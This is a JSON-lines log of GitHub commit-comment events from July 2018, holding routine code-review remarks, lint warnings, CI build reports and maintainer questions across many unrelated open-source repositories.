{"id":"7953502423","type":"CommitCommentEvent","actor":{"login":"nitinjanagam"},"repo":{"name":"methoddatascience/Crux"},"payload":{"comment":{"id":29679205,"position":null,"line":null,"path":null,"commit_id":"7daa02886d6c4b08833873e4cd0db4c79fa0cad3","created_at":"2018-07-12T01:58:24Z","updated_at":"2018-07-12T01:58:24Z","author_association":"COLLABORATOR","body":"Code to extract URLs from tweets. Currently, only those tweets that have the keyword \"ootd\" are considered. "}},"created_at":"2018-07-12T01:58:24Z"}
{"id":"7955218447","type":"CommitCommentEvent","actor":{"login":"Danielle9897"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29682878,"position":96,"line":300,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"468b1374c450b3150e8055a0beed17b62af8e71b","created_at":"2018-07-12T10:00:24Z","updated_at":"2018-07-12T10:00:24Z","author_association":"COLLABORATOR","body":"done"}},"created_at":"2018-07-12T10:00:24Z"}
{"id":"7955220148","type":"CommitCommentEvent","actor":{"login":"Aapzu"},"repo":{"name":"streamr-dev/engine-and-editor"},"payload":{"comment":{"id":29682888,"position":28,"line":48,"path":"web-app/react-app/components/AuthPage/shared/AuthStep/index.jsx","commit_id":"d424aea1a3654d71e0c65a30e12c3e87ab51220f","created_at":"2018-07-12T10:00:43Z","updated_at":"2018-07-12T10:00:43Z","author_association":"CONTRIBUTOR","body":"Some reason not to use `onFieldChange = (event: SyntheticInputEvent<EventTarget>) => {` ?"}},"created_at":"2018-07-12T10:00:43Z"}
{"id":"7955220319","type":"CommitCommentEvent","actor":{"login":"Danielle9897"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29682892,"position":109,"line":356,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"468b1374c450b3150e8055a0beed17b62af8e71b","created_at":"2018-07-12T10:00:45Z","updated_at":"2018-07-12T10:00:45Z","author_association":"COLLABORATOR","body":"done"}},"created_at":"2018-07-12T10:00:45Z"}
{"id":"7955221762","type":"CommitCommentEvent","actor":{"login":"Aapzu"},"repo":{"name":"streamr-dev/engine-and-editor"},"payload":{"comment":{"id":29682899,"position":44,"line":64,"path":"web-app/react-app/components/AuthPage/shared/AuthStep/index.jsx","commit_id":"d424aea1a3654d71e0c65a30e12c3e87ab51220f","created_at":"2018-07-12T10:01:01Z","updated_at":"2018-07-12T10:01:01Z","author_association":"CONTRIBUTOR","body":"Should this be `componentWillUnmount`?"}},"created_at":"2018-07-12T10:01:01Z"}
{"id":"7955224414","type":"CommitCommentEvent","actor":{"login":"Danielle9897"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29682911,"position":54,"line":677,"path":"src/Raven.Studio/typescript/viewmodels/database/indexes/editIndex.ts","commit_id":"468b1374c450b3150e8055a0beed17b62af8e71b","created_at":"2018-07-12T10:01:31Z","updated_at":"2018-07-12T10:01:31Z","author_association":"COLLABORATOR","body":"done"}},"created_at":"2018-07-12T10:01:31Z"}
{"id":"7955225259","type":"CommitCommentEvent","actor":{"login":"GunnarFarneback"},"repo":{"name":"rened/Knet.jl"},"payload":{"comment":{"id":29682913,"position":5,"line":10,"path":"prof/broadcast.jl","commit_id":"0ca825bbdf6145cf20a3f43d489d917b4b67b267","created_at":"2018-07-12T10:01:40Z","updated_at":"2018-07-12T10:01:40Z","author_association":"NONE","body":"In `ccall` contexts, `Nothing` would be better spelled `Cvoid`.\r\n"}},"created_at":"2018-07-12T10:01:40Z"}
{"id":"7955225445","type":"CommitCommentEvent","actor":{"login":"mondoreale"},"repo":{"name":"streamr-dev/engine-and-editor"},"payload":{"comment":{"id":29682914,"position":44,"line":64,"path":"web-app/react-app/components/AuthPage/shared/AuthStep/index.jsx","commit_id":"d424aea1a3654d71e0c65a30e12c3e87ab51220f","created_at":"2018-07-12T10:01:42Z","updated_at":"2018-07-12T10:01:42Z","author_association":"CONTRIBUTOR","body":"fml.\r\n\r\nGood catch!"}},"created_at":"2018-07-12T10:01:42Z"}
{"id":"7955227612","type":"CommitCommentEvent","actor":{"login":"Danielle9897"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29682918,"position":59,"line":682,"path":"src/Raven.Studio/typescript/viewmodels/database/indexes/editIndex.ts","commit_id":"468b1374c450b3150e8055a0beed17b62af8e71b","created_at":"2018-07-12T10:02:03Z","updated_at":"2018-07-12T10:02:03Z","author_association":"COLLABORATOR","body":"done"}},"created_at":"2018-07-12T10:02:03Z"}
{"id":"7955227628","type":"CommitCommentEvent","actor":{"login":"nofunatall"},"repo":{"name":"mistifyio/go-zfs"},"payload":{"comment":{"id":29682919,"position":4,"line":38,"path":"zpool.go","commit_id":"ae41c47571abdb8e89ff6e8d6603b8a8d62c68bd","created_at":"2018-07-12T10:02:03Z","updated_at":"2018-07-12T10:02:03Z","author_association":"NONE","body":"How does zpoolArgs invoke a zpool list exactly?\r\n\r\nIf zpool list is indeed faster than zpool get why not use something like:\r\n`out, err := zpool(\"list\", \"-o\", \"all, name)`"}},"created_at":"2018-07-12T10:02:03Z"}
{"id":"7955228385","type":"CommitCommentEvent","actor":{"login":"Aapzu"},"repo":{"name":"streamr-dev/engine-and-editor"},"payload":{"comment":{"id":29682921,"position":73,"line":115,"path":"web-app/react-app/components/AuthPage/shared/AuthStep/index.jsx","commit_id":"d424aea1a3654d71e0c65a30e12c3e87ab51220f","created_at":"2018-07-12T10:02:12Z","updated_at":"2018-07-12T10:02:12Z","author_association":"CONTRIBUTOR","body":"One more idea: the timeout could be given as a prop? Although it's now only used in one place so no real need for that configurability:)"}},"created_at":"2018-07-12T10:02:12Z"}
{"id":"7955231097","type":"CommitCommentEvent","actor":{"login":"mondoreale"},"repo":{"name":"streamr-dev/engine-and-editor"},"payload":{"comment":{"id":29682927,"position":28,"line":48,"path":"web-app/react-app/components/AuthPage/shared/AuthStep/index.jsx","commit_id":"d424aea1a3654d71e0c65a30e12c3e87ab51220f","created_at":"2018-07-12T10:02:42Z","updated_at":"2018-07-12T10:02:42Z","author_association":"CONTRIBUTOR","body":"Flow and `Event` vs `SyntheticInputEvent`. Will try something diffferent tho."}},"created_at":"2018-07-12T10:02:42Z"}
{"id":"7955237260","type":"CommitCommentEvent","actor":{"login":"Grafu"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29682935,"position":null,"line":null,"path":null,"commit_id":"93625a226154438d5d3cca612dbe088264481e61","created_at":"2018-07-12T10:03:45Z","updated_at":"2018-07-12T10:03:45Z","author_association":"NONE","body":"Wasn't it like that before? Why a change happened? Everything was good and stable before these removals."}},"created_at":"2018-07-12T10:03:45Z"}
{"id":"7955237436","type":"CommitCommentEvent","actor":{"login":"Aapzu"},"repo":{"name":"streamr-dev/engine-and-editor"},"payload":{"comment":{"id":29682936,"position":28,"line":48,"path":"web-app/react-app/components/AuthPage/shared/AuthStep/index.jsx","commit_id":"d424aea1a3654d71e0c65a30e12c3e87ab51220f","created_at":"2018-07-12T10:03:47Z","updated_at":"2018-07-12T10:03:47Z","author_association":"CONTRIBUTOR","body":"If flow requires it then this is fine ofc:)"}},"created_at":"2018-07-12T10:03:47Z"}
{"id":"7955239589","type":"CommitCommentEvent","actor":{"login":"Mekkush"},"repo":{"name":"thymeleaf/thymeleafexamples-gtvg"},"payload":{"comment":{"id":29682940,"position":null,"line":null,"path":null,"commit_id":"dafd1daae8dfdd47f65a8d7438dbc8499c873a5e","created_at":"2018-07-12T10:04:12Z","updated_at":"2018-07-12T10:04:12Z","author_association":"NONE","body":"what is the simplest way to pass data from drop-down list?\r\n"}},"created_at":"2018-07-12T10:04:12Z"}
{"id":"7955240138","type":"CommitCommentEvent","actor":{"login":"RReverser"},"repo":{"name":"tdewolff/minify"},"payload":{"comment":{"id":29682942,"position":null,"line":null,"path":null,"commit_id":"835afedd1a7d95549ad735ed1c5ba3d357e21674","created_at":"2018-07-12T10:04:17Z","updated_at":"2018-07-12T10:04:17Z","author_association":"CONTRIBUTOR","body":"But tokens are still the same as in regular CSS, so whitespace removal should work the same as anywhere else? "}},"created_at":"2018-07-12T10:04:17Z"}
{"id":"7955247040","type":"CommitCommentEvent","actor":{"login":"PhilWakelin"},"repo":{"name":"cicsdev/cics-java-jcics-samples"},"payload":{"comment":{"id":29682950,"position":null,"line":null,"path":null,"commit_id":"6d2b5b53f132d05b3621dbe66b85f56eca770d38","created_at":"2018-07-12T10:05:36Z","updated_at":"2018-07-12T10:05:36Z","author_association":"MEMBER","body":"Suggest wording would be better as\r\n\r\nThe TS, TD, VSAM and LINK sample projects manipulate byte-oriented record structures using Java classes generated using the IBM Record Generator for Java. The generated classes can be found packaged in a JAR file, found in the `lib/`subdirectory  of the relevant project. Only the compiled helper classes are required to compile and run the application, however the generated source files are included for reference.\r\n\r\nIf you are manually adding source files to your Eclipse development environment, you will need to add the generated JAR file to the buildpath in order to compile the samples, using the menu Build Path -> Configure Build Path -> Libraries"}},"created_at":"2018-07-12T10:05:36Z"}
{"id":"7955247204","type":"CommitCommentEvent","actor":{"login":"browncrane"},"repo":{"name":"kochedykov/jlibmodbus"},"payload":{"comment":{"id":29682951,"position":14,"line":37,"path":"src/com/invertor/modbus/net/ModbusMasterConnectionTCP.java","commit_id":"e3e8779d7730936fdaeb3dcbd53f4b39a46e3412","created_at":"2018-07-12T10:05:38Z","updated_at":"2018-07-12T10:05:38Z","author_association":"CONTRIBUTOR","body":"Trying to debug my `extends` of `ModbusConnection` by comparing with `ModbusMasterConnectionTCP`.\r\nHowever, meet the dead end here. Would raise an issue to ask for help."}},"created_at":"2018-07-12T10:05:38Z"}
{"id":"7955247364","type":"CommitCommentEvent","actor":{"login":"ldct"},"repo":{"name":"ethereum/pyethereum"},"payload":{"comment":{"id":29682954,"position":null,"line":null,"path":null,"commit_id":"28ac6d07dae776547ebb9ac08fb220785f53d838","created_at":"2018-07-12T10:05:39Z","updated_at":"2018-07-12T10:05:39Z","author_association":"CONTRIBUTOR","body":"@joeykrug can this be reflected on PyPI as well?"}},"created_at":"2018-07-12T10:05:39Z"}
{"id":"7955255942","type":"CommitCommentEvent","actor":{"login":"mondwan"},"repo":{"name":"danielzzz/node-ping"},"payload":{"comment":{"id":29682973,"position":null,"line":null,"path":null,"commit_id":"e478c164390a438cfabcd376a32c36d31bb3ecf0","created_at":"2018-07-12T10:07:14Z","updated_at":"2018-07-12T10:07:14Z","author_association":"COLLABORATOR","body":"Sorry I don't have permission to push to npmjs. @danielzzzz can u push to npmjs?"}},"created_at":"2018-07-12T10:07:14Z"}
{"id":"7955256606","type":"CommitCommentEvent","actor":{"login":"marius93rm"},"repo":{"name":"Mattens15/RaspiCam"},"payload":{"comment":{"id":29682976,"position":null,"line":null,"path":null,"commit_id":"c7c40796c8a3bb73810dea62970a4fcc9bcf306a","created_at":"2018-07-12T10:07:21Z","updated_at":"2018-07-12T10:07:21Z","author_association":"COLLABORATOR","body":"Ma Mihai l'aveva fatta in 30 secondi con tanto amore!!!"}},"created_at":"2018-07-12T10:07:21Z"}
{"id":"7955257700","type":"CommitCommentEvent","actor":{"login":"Danielle9897"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29682978,"position":260,"line":547,"path":"src/Raven.Studio/wwwroot/App/views/database/indexes/editIndex.html","commit_id":"468b1374c450b3150e8055a0beed17b62af8e71b","created_at":"2018-07-12T10:07:34Z","updated_at":"2018-07-12T10:07:34Z","author_association":"COLLABORATOR","body":"done"}},"created_at":"2018-07-12T10:07:34Z"}
{"id":"7955257977","type":"CommitCommentEvent","actor":{"login":"Sorokinsta"},"repo":{"name":"WebEducationPlatform/BackEnd"},"payload":{"comment":{"id":29682979,"position":27,"line":138,"path":"webapp/src/main/java/education/web/platform/controllers/user/CourseController.java","commit_id":"5ff406d874474bb45fb5d046cc7166e94ed474b8","created_at":"2018-07-12T10:07:37Z","updated_at":"2018-07-12T10:07:37Z","author_association":"CONTRIBUTOR","body":"в прошлом комите я просил удалить эту сортировку и загружать уже отсортированными"}},"created_at":"2018-07-12T10:07:37Z"}
{"id":"7955260207","type":"CommitCommentEvent","actor":{"login":"tlwl020217"},"repo":{"name":"endersonmaia/zabbix-templates"},"payload":{"comment":{"id":29682982,"position":null,"line":null,"path":null,"commit_id":"bbf421a03b4bd403ccbb74759b1a8e33130cae66","created_at":"2018-07-12T10:08:04Z","updated_at":"2018-07-12T10:08:04Z","author_association":"NONE","body":"supported"}},"created_at":"2018-07-12T10:08:04Z"}
{"id":"7955262505","type":"CommitCommentEvent","actor":{"login":"Sorokinsta"},"repo":{"name":"WebEducationPlatform/BackEnd"},"payload":{"comment":{"id":29682991,"position":4,"line":79,"path":"models/src/main/java/education/web/platform/models/course/StudentCourseInfo.java","commit_id":"082ba3e1fbc28edf5bae1e38f098d03248a30f2c","created_at":"2018-07-12T10:08:31Z","updated_at":"2018-07-12T10:08:31Z","author_association":"CONTRIBUTOR","body":"по какому принципу сортируются элементы коллекции?"}},"created_at":"2018-07-12T10:08:31Z"}
{"id":"7955265446","type":"CommitCommentEvent","actor":{"login":"mozzy11"},"repo":{"name":"openmrs/openmrs-module-legacyui"},"payload":{"comment":{"id":29683000,"position":null,"line":null,"path":null,"commit_id":"18124e8d6c126d411464c168cff5a9fefbde7edd","created_at":"2018-07-12T10:09:06Z","updated_at":"2018-07-12T10:09:06Z","author_association":"NONE","body":"ok let me do that thx @samuelmale "}},"created_at":"2018-07-12T10:09:06Z"}
{"id":"7955266611","type":"CommitCommentEvent","actor":{"login":"vedantpuri"},"repo":{"name":"Skyflash/skyflash.github.io"},"payload":{"comment":{"id":29683002,"position":null,"line":null,"path":null,"commit_id":"ee826ab56e1a693262fe25393ed7c63a92ce9ccc","created_at":"2018-07-12T10:09:19Z","updated_at":"2018-07-12T10:09:19Z","author_association":"NONE","body":"You're welcome @Skyflash ! 👍"}},"created_at":"2018-07-12T10:09:19Z"}
{"id":"7955267688","type":"CommitCommentEvent","actor":{"login":"chermsdorf"},"repo":{"name":"CoolProp/CoolProp"},"payload":{"comment":{"id":29683004,"position":null,"line":null,"path":null,"commit_id":"0fdc8b2125bc011e99117b456eef672656be7ef9","created_at":"2018-07-12T10:09:32Z","updated_at":"2018-07-12T10:09:32Z","author_association":"NONE","body":"Hi Ian,\r\n\r\nI had problems with the master branch of CoolProp which is why I checked out the CoolProp v6.1.0 tag according to Thomas Pedot's suggestions (see https://github.com/modelica/ExternalMedia/issues/14). But in doing so I do not receive the updated .gitmodules. So my question is if the path could be corrected in the v6.1.0 tag  as well.\r\n\r\nBest regards\r\nChristian"}},"created_at":"2018-07-12T10:09:32Z"}
{"id":"7955268531","type":"CommitCommentEvent","actor":{"login":"lacabra"},"repo":{"name":"enigmampc/catalyst"},"payload":{"comment":{"id":29683005,"position":121,"line":400,"path":"tests/exchange/test_ccxt.py","commit_id":"5b9a8c2ba718e6d48aed1ee758e75248e67110b8","created_at":"2018-07-12T10:09:42Z","updated_at":"2018-07-12T10:09:42Z","author_association":"MEMBER","body":"@AvishaiW if you don't plan to use `e`, then flake8 throws an error because `e` is unused. Undoing this change to comply with PEP8 checks."}},"created_at":"2018-07-12T10:09:42Z"}
{"id":"7955268618","type":"CommitCommentEvent","actor":{"login":"Ast104"},"repo":{"name":"bjut-summer-work/MainUse"},"payload":{"comment":{"id":29683006,"position":null,"line":null,"path":null,"commit_id":"ee39dcee045368336a667006fcc0ee3eed2c22e8","created_at":"2018-07-12T10:09:43Z","updated_at":"2018-07-12T10:09:43Z","author_association":"CONTRIBUTOR","body":"小更新\r\n\r\n增加不登陆选项\r\n增加非本人无法进行编辑\r\n\r\n注意之后检索文章和用户要按照role排序"}},"created_at":"2018-07-12T10:09:43Z"}
{"id":"7955268718","type":"CommitCommentEvent","actor":{"login":"curioswitch-role"},"repo":{"name":"curioswitch/curiostack"},"payload":{"comment":{"id":29683007,"position":null,"line":null,"path":null,"commit_id":"1fcdc8dc5436f839fc4bb89411afd6db0e95af8a","created_at":"2018-07-12T10:09:44Z","updated_at":"2018-07-12T10:09:44Z","author_association":"NONE","body":"Build failed. Check the logs and try again.\n\nLogs:\nhttps://console.cloud.google.com/gcr/builds/67b55a1a-22d2-4440-a4ab-5eb58f07e7fc?project=153942441948"}},"created_at":"2018-07-12T10:09:44Z"}
{"id":"7955269347","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29683009,"position":57,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/storage/fragment/database/CompanyFragment.java","commit_id":"97a3d0b1073af79b56f2cfe7e94334bb7a7409fb","created_at":"2018-07-12T10:09:52Z","updated_at":"2018-07-12T10:09:52Z","author_association":"NONE","body":"WARNING: [InflateParams] Avoid passing `null` as the view root (needed to resolve layout parameters on the inflated layout's root element)\n When inflating a layout, avoid passing in null as the parent view, since otherwise any layout parameters on the root of the inflated layout will be ignored."}},"created_at":"2018-07-12T10:09:52Z"}
{"id":"7955269374","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29683010,"position":41,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/storage/model/database/database/EmployeeDAO.java","commit_id":"97a3d0b1073af79b56f2cfe7e94334bb7a7409fb","created_at":"2018-07-12T10:09:52Z","updated_at":"2018-07-12T10:09:52Z","author_association":"NONE","body":"WARNING: [Recycle] This `Cursor` should be freed up after use with `#close()`\n Many resources, such as TypedArrays, VelocityTrackers, etc., should be recycled (with a `recycle()` call) after use. This lint check looks for missing `recycle()` calls."}},"created_at":"2018-07-12T10:09:52Z"}
{"id":"7955269516","type":"CommitCommentEvent","actor":{"login":"axionl"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":29683012,"position":null,"line":null,"path":null,"commit_id":"bff35646608398de5a629fa8dc2362bb63a61272","created_at":"2018-07-12T10:09:54Z","updated_at":"2018-07-12T10:09:54Z","author_association":"MEMBER","body":"@lilydjwg \"version\" ?"}},"created_at":"2018-07-12T10:09:54Z"}
{"id":"7955270525","type":"CommitCommentEvent","actor":{"login":"Erufailon4"},"repo":{"name":"Erufailon4/ErufailonMod"},"payload":{"comment":{"id":29683017,"position":null,"line":null,"path":null,"commit_id":"39fae5e432bd9730672e9deb174f7a144f89852f","created_at":"2018-07-12T10:10:06Z","updated_at":"2018-07-12T10:10:06Z","author_association":"OWNER","body":"The texture not showing issue seems to be https://github.com/MinecraftForge/MinecraftForge/pull/4898 -related, I'm working on a fix"}},"created_at":"2018-07-12T10:10:06Z"}
{"id":"7955274100","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29683022,"position":null,"line":null,"path":null,"commit_id":"86b95408fdd8b8131ad2d8064a71a01920c1db2c","created_at":"2018-07-12T10:10:48Z","updated_at":"2018-07-12T10:10:48Z","author_association":"NONE","body":"fix_restrictive_cli (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-86b95408fdd8b8131ad2d8064a71a01920c1db2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-86b95408fdd8b8131ad2d8064a71a01920c1db2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-86b95408fdd8b8131ad2d8064a71a01920c1db2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-12T10:10:48Z"}
{"id":"7955280704","type":"CommitCommentEvent","actor":{"login":"axionl"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":29683038,"position":null,"line":null,"path":null,"commit_id":"84c3be2b21df6150a883d81ee48ea714eb2c2d2d","created_at":"2018-07-12T10:12:07Z","updated_at":"2018-07-12T10:12:07Z","author_association":"MEMBER","body":"發現手滑刪多了一行，等下回去補上"}},"created_at":"2018-07-12T10:12:07Z"}
{"id":"7955282581","type":"CommitCommentEvent","actor":{"login":"Sorokinsta"},"repo":{"name":"WebEducationPlatform/BackEnd"},"payload":{"comment":{"id":29683043,"position":68,"line":105,"path":"webapp/src/main/java/education/web/platform/controllers/AdminDirectionController.java","commit_id":"7709605f228cbf9750a7270c41320e57ec617745","created_at":"2018-07-12T10:12:29Z","updated_at":"2018-07-12T10:12:29Z","author_association":"CONTRIBUTOR","body":"доставать целое направление из базы ради лога - неправильно, достань только название"}},"created_at":"2018-07-12T10:12:29Z"}
{"id":"7955285082","type":"CommitCommentEvent","actor":{"login":"mondoreale"},"repo":{"name":"streamr-dev/engine-and-editor"},"payload":{"comment":{"id":29683047,"position":73,"line":115,"path":"web-app/react-app/components/AuthPage/shared/AuthStep/index.jsx","commit_id":"d424aea1a3654d71e0c65a30e12c3e87ab51220f","created_at":"2018-07-12T10:12:59Z","updated_at":"2018-07-12T10:12:59Z","author_association":"CONTRIBUTOR","body":"Yep, one place, leaving it as it is for now. :)"}},"created_at":"2018-07-12T10:12:59Z"}
{"id":"7955285975","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29683050,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-12T10:13:10Z","updated_at":"2018-07-12T10:13:10Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T10:13:10Z"}
{"id":"7955286925","type":"CommitCommentEvent","actor":{"login":"jorisvanroosbroeck"},"repo":{"name":"jorisvanroosbroeck/my-net"},"payload":{"comment":{"id":29683053,"position":null,"line":null,"path":null,"commit_id":"e7777657e3b6893ca1d9e83ee724ddcd48ba2151","created_at":"2018-07-12T10:13:21Z","updated_at":"2018-07-12T10:13:21Z","author_association":"OWNER","body":"HIAG module file problem"}},"created_at":"2018-07-12T10:13:21Z"}
{"id":"7955287837","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29683056,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-12T10:13:32Z","updated_at":"2018-07-12T10:13:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T10:13:32Z"}
{"id":"7955289973","type":"CommitCommentEvent","actor":{"login":"wilsonge"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":29683064,"position":9,"line":586,"path":"administrator/templates/atum/css/template-rtl.css","commit_id":"984c4582a57fa4efe69c7f858d7144b4993d414b","created_at":"2018-07-12T10:13:57Z","updated_at":"2018-07-12T10:13:57Z","author_association":"CONTRIBUTOR","body":"All I did was fix the broken path - don't ask/murder me about how it's implemented :P "}},"created_at":"2018-07-12T10:13:57Z"}
{"id":"7955291124","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29683066,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-12T10:14:12Z","updated_at":"2018-07-12T10:14:12Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T10:14:12Z"}
{"id":"7955295938","type":"CommitCommentEvent","actor":{"login":"Samodepalace"},"repo":{"name":"sysstat/sysstat"},"payload":{"comment":{"id":29683079,"position":null,"line":null,"path":null,"commit_id":"ef3301e2ab3e54124b2dc2171f0cf1217f79fa43","created_at":"2018-07-12T10:15:11Z","updated_at":"2018-07-12T10:15:11Z","author_association":"NONE","body":"Hello, \r\n\r\nSorry, we want to use 11.7.3 with our customers but as this is still classified as \"Development\", they will not install it. Please would you provide an estimation as to when either 11.7.3 or 11.7.4 will be classified as \"Stable\" ?\r\n\r\nThanks"}},"created_at":"2018-07-12T10:15:11Z"}
{"id":"7955301109","type":"CommitCommentEvent","actor":{"login":"feherneoh"},"repo":{"name":"Android4Lumia/android_external_libinit_dpp"},"payload":{"comment":{"id":29683090,"position":null,"line":null,"path":null,"commit_id":"49df9f891ea5fa29b32d0fc12a2ed4fb3b16eed2","created_at":"2018-07-12T10:16:14Z","updated_at":"2018-07-12T10:16:14Z","author_association":"CONTRIBUTOR","body":"There seem to be some misunderstandings when it comes it device detection. It's not TWRP that checks the ZIP, but the other way around"}},"created_at":"2018-07-12T10:16:14Z"}
{"id":"7955302883","type":"CommitCommentEvent","actor":{"login":"jburse"},"repo":{"name":"jariazavalverde/tau-prolog"},"payload":{"comment":{"id":29683093,"position":null,"line":null,"path":null,"commit_id":"703b016ce64ffde744b08fa01bf4d603e54ef3a5","created_at":"2018-07-12T10:16:34Z","updated_at":"2018-07-12T10:16:34Z","author_association":"NONE","body":"\\+ goals don't need to be call/1 wrapped usually.\r\nISO body conversion doesn't affect \\+.\r\n\r\n![grafik](https://user-images.githubusercontent.com/5411487/42627462-65a19436-85cd-11e8-95ea-906ff356ab1d.png)\r\n"}},"created_at":"2018-07-12T10:16:34Z"}
{"id":"7955304043","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29683096,"position":5,"line":21,"path":"4-2a/4-2a.cpp","commit_id":"f4812deece0a3e0c62b3cc19a2797f02135b3e2e","created_at":"2018-07-12T10:16:49Z","updated_at":"2018-07-12T10:16:49Z","author_association":"COLLABORATOR","body":"山本　指摘\r\nループのendが存在しないため、無限ループとなります。\r\nループの終了値について記載してください。"}},"created_at":"2018-07-12T10:16:49Z"}
{"id":"7955306235","type":"CommitCommentEvent","actor":{"login":"Danielle9897"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29683100,"position":43,"line":128,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"468b1374c450b3150e8055a0beed17b62af8e71b","created_at":"2018-07-12T10:17:14Z","updated_at":"2018-07-12T10:17:14Z","author_association":"COLLABORATOR","body":"done"}},"created_at":"2018-07-12T10:17:14Z"}
{"id":"7955308162","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29683103,"position":5,"line":19,"path":"4-2b/4-2b.cpp","commit_id":"b9eaaf24fd25861a4df597595404c69b5701d5c3","created_at":"2018-07-12T10:17:37Z","updated_at":"2018-07-12T10:17:37Z","author_association":"COLLABORATOR","body":"山本　指摘\r\nループのendが存在しないため、無限ループとなります。\r\nループの終了値について記載してください。"}},"created_at":"2018-07-12T10:17:37Z"}
